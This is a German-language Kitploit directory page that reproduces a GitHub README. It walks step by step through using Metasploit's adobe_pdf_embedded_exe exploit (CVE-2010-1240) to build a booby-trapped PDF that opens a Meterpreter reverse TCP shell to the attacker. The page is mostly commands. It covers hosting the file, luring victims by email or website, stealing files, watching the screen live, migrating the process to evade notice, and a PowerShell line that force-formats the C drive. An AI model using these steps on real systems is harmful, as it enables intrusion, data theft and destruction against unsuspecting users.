Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Embedded-PDF — Dieses Demonstrationsvideo zeigt, wie wir das Gerät des Opfers steuern können, indem wir die harmlos aussehende PDF-Datei an das Ziel senden, die tatsächlich einen eingebetteten Payload enthält. Der Exploit wurde als CVE-2010-1240 veröffentlicht. | Kitploit
Tools/GitHubGitHub/jasmoon99/embedded-pdf
Phishing-ToolsPayload-GenerierungExploitationPost-ExploitationPenetrationstestsCommand and ControlSocial EngineeringLernen & BildungRemote-Access-Tool
GitHubjasmoon99/embedded-pdf

Embedded-PDF

Dieses Demonstrationsvideo zeigt, wie wir das Gerät des Opfers steuern können, indem wir die harmlos aussehende PDF-Datei an das Ziel senden, die tatsächlich einen eingebetteten Payload enthält. Der Exploit wurde als CVE-2010-1240 veröffentlicht.

7163vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

Eingebettete Hintertür-Verbindung über PDF-Dateien 😈

bereitgestellt von    

Einleitung

Dieses Demonstrationsvideo zeigt, wie wir das Gerät des Opfers steuern können, indem wir die harmlos aussehende PDF-Datei an das Ziel senden, die tatsächlich eine eingebettete Nutzlast enthält. Der Exploit wurde als CVE-2010-1240 veröffentlicht.

Sobald die PDF in Adobe Reader geöffnet wird, ermöglichen uns die Benutzer, die von uns getäuscht werden und den Sicherheits-Popups zustimmen, eine Meterpreter-Sitzung zu erhalten, die über eine Reverse-TCP-Verbindung mit ihren Geräten verbunden ist. Bis dahin sind alle ihre Daten und das, was sie gerade tun, unter unserer Überwachung.

Hehe~Boi

Liste der Software/Werkzeuge

  • Metasploit
  • Adobe Reader <= 8.1.2

Umgebung

Kali Linux         Windows 7 or 10         Adobe Reader        

  • Angreifer-Maschine: Kali Linux Version 2021.1
  • Zielbetriebssystem: Windows 10 (x86) oder Windows 7 (x86)
  • Zielsoftware: Adobe Reader 8.1.2

Detaillierte Schritte

Zuerst starten wir die MSFconsole, die eine Befehlszeilenschnittstelle für den Zugriff auf das Metasploit-Framework bietet.

root@kitploit:~
msfconsole

Dann suchen wir nach einem Exploit, der auf unsere Zielplattform Windows und Adobe PDF Reader passt, wobei eine ganze Liste von Exploits angezeigt wird, die verwendet werden können, um in den Windows-Rechner des Opfers einzudringen und die Schwachstellen von Adobe PDF Reader auszunutzen.

root@kitploit:~
search type:exploit platform:windows adobe pdf

Bei dieser Ausnutzung wählen und verwenden wir das Modul 'adobe_pdf_embedded_exe' mit dem folgenden Befehl, um das Eindringen in den Rechner des Opfers zu erreichen.

root@kitploit:~
use exploit/windows/fileformat/adobe_pdf_embedded_exe

Wir können auch die Informationen des Exploits mit dem Befehl 'info' überprüfen, wie unten gezeigt:

root@kitploit:~
info

Dann setzen wir die Nutzlast auf Reverse-TCP-Verbindung. Wir verwenden auch den Meterpreter, der eine interaktive Shell bereitstellt, die es uns erleichtert, alle Arten von Funktionen zu nutzen, indem wir Code einfügen und ausführen, um den Rechner des Opfers zu erkunden.

root@kitploit:~
set payload windows/meterpreter/reverse_tcp

Dann setzen wir den lauschenden Host und Port. Für LHOST müssen wir die IP-Adresse der Angreifer-Maschine eingeben, in diesem Fall die IP-Adresse unserer Kali-Maschine (10.0.2.4).

  • *p.s.
    • Sie müssen Ihre eigene Kali-Maschinen-IP verwenden
    • Sie können eine andere Portnummer verwenden
root@kitploit:~
# to check Kali machine’s IP address
ifconfig

set LHOST *10.0.2.4*
set LPORT 5665

Dann setzen wir die Eingabedatei für die Basis der PDF mit dem INFILENAME*-Flag. Als Nächstes setzen wir den Dateinamen auf etwas, das das Interesse des Opfers weckt, die bösartige PDF-Datei zu öffnen.

  • *p.s.
    • Sie müssen sicherstellen, dass Ihr PDF-Dateipfad korrekt ist
    • Sie können einen anderen Dateinamen verwenden
root@kitploit:~
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'

Wir können unsere Optionen erneut anzeigen, bevor wir den Befehl 'exploit' eingeben, um die Nutzlast zusammen mit der PDF zu generieren.

root@kitploit:~
# Then we can show the info or options by
show info | show options

exploit

Sobald wir die PDF-Datei generiert haben, verschieben wir die Datei nach /var/www/html, dem Verzeichnis unserer Kali-Maschine, um den Webserver zu hosten, damit das Opfer die PDF-Datei später herunterladen kann.

  • Notiz:
    • Wenn Sie einen anderen Dateinamen festgelegt haben, stellen Sie sicher, dass Sie den richtigen Pfad kopieren!
root@kitploit:~
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html

Dann richten wir unseren Listener mit 'exploit/multi/handler' ein. Wieder setzen wir die Nutzlast, LHOST, LPORT in Übereinstimmung mit dem, was wir bei der Generierung der bösartigen PDF-Datei definiert haben. Dann führen wir die Nutzlast aus.

  • Notiz:
    • LHOST: Bitte beachten Sie Ihre eigene Kali-Maschinen-IP-Adresse
    • LPORT: Wenn Sie eine andere Portnummer festgelegt haben, stellen Sie sicher, dass Sie die Nummer korrekt eingeben
    • show info oder show options sind optionale Befehle, die Sie ausführen können. Sie dienen nur zur Überprüfung dessen, was Sie gerade eingestellt haben.
root@kitploit:~
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run

In einem anderen Terminal überprüfen wir den Status des Apache-Servers, um sicherzustellen, dass er läuft, um unsere PDF-Datei in /var/www/html für das Opfer zum Herunterladen zu hosten.

root@kitploit:~
service apache2 status

# If it is inactive, start the service
service apache2 start

Öffnen Sie auf dem Windows-Rechner einen beliebigen Browser (z. B. Chrome) und geben Sie die IP unserer Kali-Maschine (10.0.2.4) ein, um auf den Webserver der Kali-Maschine zuzugreifen.

*Notiz: Bitte beachten Sie Ihre eigene Kali-Maschinen-IP-Adresse

Dann simulieren Sie einen Benutzer und speichern Sie die beabsichtigte PDF-Datei.

Sobald die Datei vom Opfer in Adobe Reader 8.1.2 geöffnet wird und es den Sicherheits-Popups zustimmt, können wir auf unserer Kali-Maschine beobachten, dass eine neue Sitzung über eine Reverse-TCP-Verbindung hergestellt wurde.

Im realen Szenario würden wir eine Website mit der PDF mit eingebetteter Nutzlast einrichten, damit das Opfer die Datei herunterladen kann, oder sie per E-Mail anhängen.


Ergebnis der Ausnutzung

Dann können wir remote auf den Rechner des Opfers zugreifen und weitere bösartige Aktionen durchführen, die wir in der Meterpreter-Sitzung durchführen möchten.

Um eine Liste der möglichen Aktionen anzuzeigen

root@kitploit:~
help

Aktuelles Verzeichnis auflisten

root@kitploit:~
pwd

Dateien in diesem Verzeichnis auflisten

root@kitploit:~
ls

Ordner oder Datei vom Rechner des Opfers herunterladen

Wenn es z. B. eine Datei namens password.txt gibt, können wir den Befehl download password.txt ausführen

root@kitploit:~
download [folder name | filename with extension]

Datei auf dem Rechner des Opfers erstellen

Natürlich können wir bösartige Skripte schreiben (Hintertür einpflanzen), um die Verbindung zum Windows-Rechner aufrechtzuerhalten, wenn wir wirklich böse sind! 💀

root@kitploit:~
   # Boot command prompt at background
   execute -f cmd.exe -H -i
   
   # Create file on Windows
   echo "You have been hacked" > hack.txt    

Mit Windows interagieren

root@kitploit:~
   #open the txt file we have just created
   hack.txt

   # Take screenshot
   screenshot
   
   # Watch the remote user in real time
   screenshare

Zusätzlich

Der Angreifer kann jedoch den Verdacht verringern, indem er den Meterpreter-Prozess mit dem Migrate-Modul in der Meterpreter-Sitzung auf einen anderen Prozess verschiebt.

root@kitploit:~
meterpreter> run post/windows/manage/migrate

Hierbei wird automatisch ein neuer Prozess auf dem Rechner des Opfers erzeugt, in den der Meterpreter migriert. Das Opfer könnte dann die infizierte PDF-Datei löschen, ohne zu ahnen, dass der Prozess bereits an eine andere Stelle gewandert ist.

Der Angreifer kann weiterhin bösartige Skripte auf dem Zielrechner mit der Eingabeaufforderung (cmd) oder PowerShell erstellen, die das gesamte Betriebssystem so weit herunterfahren können, dass es nicht mehr richtig funktioniert.

root@kitploit:~
meterpreter> shell 
root@kitploit:~
# Start the Windows PowerShell
powershell

#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false

Demonstrationsvideo

Demo

Tool herunterladen